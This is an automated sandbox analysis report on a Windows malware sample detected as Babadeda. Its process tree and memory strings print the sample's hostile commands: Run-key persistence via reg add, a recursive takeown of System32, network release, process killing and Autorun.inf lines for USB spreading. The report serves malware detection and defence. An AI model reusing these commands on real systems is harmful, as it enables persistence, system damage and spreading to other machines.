Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ADZP 20 Complex.exe

Overview

General Information

Sample name:ADZP 20 Complex.exe
Analysis ID:1428362
MD5:8b6a377f9a67d5482a8eba5708f45bb2
SHA1:7197436525e568606850ee5e033c43aea1c3bc91
SHA256:6ca11c8b6442db97c02f3b0f73db61f58c96d52e8a880e33abee5b10807d993f
Tags:exe
Infos:

Detection

Babadeda
Score:58
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Babadeda
Command shell drops VBS files
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample is not signed and drops a device driver
Self deletion via cmd or bat file
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: WScript or CScript Dropper
Uses cmd line tools excessively to alter registry or file data
Uses ipconfig to lookup or modify the Windows network settings
Contains functionality to dynamically determine API calls
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Recursive Takeown
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes

Classification

Process Tree

  • System is w10x64
  • ADZP 20 Complex.exe (PID: 4448 cmdline: "C:\Users\user\Desktop\ADZP 20 Complex.exe" MD5: 8B6A377F9A67D5482A8EBA5708F45BB2)
    • conhost.exe (PID: 3288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6128 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 6300 cmdline: C:\Windows\system32\cmd.exe /K Twain_20.cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4996 cmdline: C:\Windows\system32\cmd.exe /K Twain_20.cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 6968 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • cmd.exe (PID: 6108 cmdline: C:\Windows\system32\cmd.exe /K Taskdl.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • takeown.exe (PID: 5764 cmdline: takeown /f "C:\Windows\System32" /r MD5: D258A76AA885CBBCAE8C720CD1C284A5)
      • reg.exe (PID: 1020 cmdline: reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • reg.exe (PID: 3596 cmdline: reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • ipconfig.exe (PID: 4912 cmdline: ipconfig /release MD5: 62F170FB07FDBB79CEB7147101406EB8)
      • taskkill.exe (PID: 4432 cmdline: taskkill /im DiskPart /f MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • attrib.exe (PID: 5004 cmdline: attrib -r -a -s -h *.* MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • wscript.exe (PID: 6608 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • wscript.exe (PID: 2276 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • wscript.exe (PID: 5832 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • wscript.exe (PID: 5256 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • wscript.exe (PID: 3580 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • wscript.exe (PID: 4144 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • wscript.exe (PID: 4432 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • wscript.exe (PID: 7172 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • wscript.exe (PID: 7188 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • wscript.exe (PID: 7212 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • msg.exe (PID: 7260 cmdline: msg * Virus Detectado MD5: B42553599E40029366A0FD8F81079BED)
      • msg.exe (PID: 7300 cmdline: msg * Virus Detectado MD5: B42553599E40029366A0FD8F81079BED)
      • msg.exe (PID: 7328 cmdline: msg * Has Sido Hackeado! MD5: B42553599E40029366A0FD8F81079BED)
      • ADZP 20 Complex.exe (PID: 7344 cmdline: "C:\Users\user\Desktop\ADZP 20 Complex.exe" MD5: 8B6A377F9A67D5482A8EBA5708F45BB2)
        • conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7504 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\B132.tmp\B133.tmp\B134.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • notepad.exe (PID: 7360 cmdline: notepad MD5: 27F71B12CB585541885A31BE22F61C83)
      • calc.exe (PID: 7372 cmdline: calc MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • explorer.exe (PID: 7412 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • mspaint.exe (PID: 7440 cmdline: mspaint.exe MD5: F221A4CCAFEC690101C59F726C95B646)
      • ADZP 20 Complex.exe (PID: 7528 cmdline: "C:\Users\user\Desktop\ADZP 20 Complex.exe" MD5: 8B6A377F9A67D5482A8EBA5708F45BB2)
        • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7820 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\B539.tmp\B53A.tmp\B53B.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • notepad.exe (PID: 7548 cmdline: notepad MD5: 27F71B12CB585541885A31BE22F61C83)
      • calc.exe (PID: 7612 cmdline: calc MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • explorer.exe (PID: 7704 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • mspaint.exe (PID: 7852 cmdline: mspaint.exe MD5: F221A4CCAFEC690101C59F726C95B646)
      • ADZP 20 Complex.exe (PID: 7892 cmdline: "C:\Users\user\Desktop\ADZP 20 Complex.exe" MD5: 8B6A377F9A67D5482A8EBA5708F45BB2)
        • conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 8116 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\BE03.tmp\BE04.tmp\BE05.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • notepad.exe (PID: 8032 cmdline: notepad MD5: 27F71B12CB585541885A31BE22F61C83)
      • calc.exe (PID: 8068 cmdline: calc MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • explorer.exe (PID: 7308 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • Calculator.exe (PID: 7880 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca MD5: 94675EB54AC5DAA11ACE736DBFA9E7A2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
BabadedaAccording to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
ADZP 20 Complex.exeJoeSecurity_BabadedaYara detected BabadedaJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\Twain_20.dllJoeSecurity_BabadedaYara detected BabadedaJoe Security
      C:\Users\user\Desktop\Twain_20.dllJoeSecurity_BabadedaYara detected BabadedaJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        37.2.ADZP 20 Complex.exe.400000.0.unpackJoeSecurity_BabadedaYara detected BabadedaJoe Security
          30.0.ADZP 20 Complex.exe.400000.0.unpackJoeSecurity_BabadedaYara detected BabadedaJoe Security
            37.0.ADZP 20 Complex.exe.400000.0.unpackJoeSecurity_BabadedaYara detected BabadedaJoe Security
              47.2.ADZP 20 Complex.exe.400000.0.unpackJoeSecurity_BabadedaYara detected BabadedaJoe Security
                47.0.ADZP 20 Complex.exe.400000.0.unpackJoeSecurity_BabadedaYara detected BabadedaJoe Security
                  Click to see the 3 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
                  Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wscript.exe, SourceProcessId: 4432, StartAddress: F9E9BCC0, TargetImage: C:\Windows\System32\taskkill.exe, TargetProcessId: 4432
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6128, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs" , ProcessId: 6968, ProcessName: wscript.exe
                  Sigma detected: Suspicious Recursive Takeown
                  Source: Process startedAuthor: frack113: Data: Command: takeown /f "C:\Windows\System32" /r, CommandLine: takeown /f "C:\Windows\System32" /r, CommandLine|base64offset|contains: , Image: C:\Windows\System32\takeown.exe, NewProcessName: C:\Windows\System32\takeown.exe, OriginalFileName: C:\Windows\System32\takeown.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K Taskdl.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6108, ParentProcessName: cmd.exe, ProcessCommandLine: takeown /f "C:\Windows\System32" /r, ProcessId: 5764, ProcessName: takeown.exe
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6128, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs" , ProcessId: 6968, ProcessName: wscript.exe
                  Sigma detected: Proxy Execution Via Explorer.exe
                  Source: Process startedAuthor: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative: Data: Command: explorer.exe, CommandLine: explorer.exe, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6128, ParentProcessName: cmd.exe, ProcessCommandLine: explorer.exe, ProcessId: 7412, ProcessName: explorer.exe

                  Snort Signatures

                  No Snort rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: ADZP 20 Complex.exeAvira: detected
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.batAvira: detection malicious, Label: BAT/Agent.RAA
                  Source: C:\Users\user\Desktop\Twain_20.dllAvira: detection malicious, Label: TR/AD.BatBadJoke.javlp
                  Source: C:\Users\user\AppData\Local\Temp\B539.tmp\B53A.tmp\B53B.batAvira: detection malicious, Label: BAT/Agent.RAA
                  Source: C:\Users\user\AppData\Local\Temp\B132.tmp\B133.tmp\B134.batAvira: detection malicious, Label: BAT/Agent.RAA
                  Source: C:\Users\user\Desktop\Twain_20.dllAvira: detection malicious, Label: TR/AD.BatBadJoke.javlp
                  Source: C:\Users\user\AppData\Local\Temp\BE03.tmp\BE04.tmp\BE05.batAvira: detection malicious, Label: BAT/Agent.RAA
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\Desktop\Twain_20.dllReversingLabs: Detection: 63%
                  Source: C:\Windows\System32\Twain_20.dllReversingLabs: Detection: 63%
                  Multi AV Scanner detection for submitted file
                  Source: ADZP 20 Complex.exeReversingLabs: Detection: 63%
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\Desktop\Twain_20.dllJoe Sandbox ML: detected
                  Source: C:\Users\user\Desktop\Twain_20.dllJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: ADZP 20 Complex.exeJoe Sandbox ML: detected
                  Source: ADZP 20 Complex.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.000000000254C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo off>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.000000000254C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.000000000254C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.000000000254C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.000000000254C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.000000000254C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Label=???>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000000.00000002.3314133631.0000000002300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo off>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000000.00000002.3314133631.0000000002300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000000.00000002.3314133631.0000000002300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000000.00000002.3314133631.0000000002300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000000.00000002.3314133631.0000000002300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000000.00000002.3314133631.0000000002300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Label=???>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000000.00000003.1972664336.000000000254D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo off>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000000.00000003.1972664336.000000000254D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000000.00000003.1972664336.000000000254D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000000.00000003.1972664336.000000000254D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000000.00000003.1972664336.000000000254D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000000.00000003.1972664336.000000000254D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Label=???>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.0000000002540000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo off>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.0000000002540000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.0000000002540000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.0000000002540000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.0000000002540000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.0000000002540000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Label=???>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.0000000002510000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo off>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.0000000002510000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.0000000002510000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.0000000002510000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.0000000002510000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.0000000002510000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Label=???>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.000000000251C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo off>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.000000000251C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.000000000251C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.000000000251C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.000000000251C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.000000000251C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Label=???>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000001E.00000003.2030226696.000000000251D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo off>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000001E.00000003.2030226696.000000000251D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000001E.00000003.2030226696.000000000251D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000001E.00000003.2030226696.000000000251D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000001E.00000003.2030226696.000000000251D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000001E.00000003.2030226696.000000000251D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Label=???>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000001E.00000002.3240149731.0000000002160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo off>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000001E.00000002.3240149731.0000000002160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000001E.00000002.3240149731.0000000002160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000001E.00000002.3240149731.0000000002160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000001E.00000002.3240149731.0000000002160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000001E.00000002.3240149731.0000000002160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Label=???>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.000000000234C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo off>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.000000000234C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.000000000234C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.000000000234C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.000000000234C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.000000000234C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Label=???>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000025.00000002.3256041689.00000000021A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo off>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000025.00000002.3256041689.00000000021A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000025.00000002.3256041689.00000000021A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000025.00000002.3256041689.00000000021A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000025.00000002.3256041689.00000000021A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000025.00000002.3256041689.00000000021A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Label=???>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000025.00000003.2044192341.000000000234D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo off>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000025.00000003.2044192341.000000000234D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000025.00000003.2044192341.000000000234D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000025.00000003.2044192341.000000000234D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000025.00000003.2044192341.000000000234D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000025.00000003.2044192341.000000000234D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Label=???>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.0000000002340000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo off>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.0000000002340000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.0000000002340000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.0000000002340000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.0000000002340000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.0000000002340000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Label=???>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.0000000002300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo off>>Autorun.inf
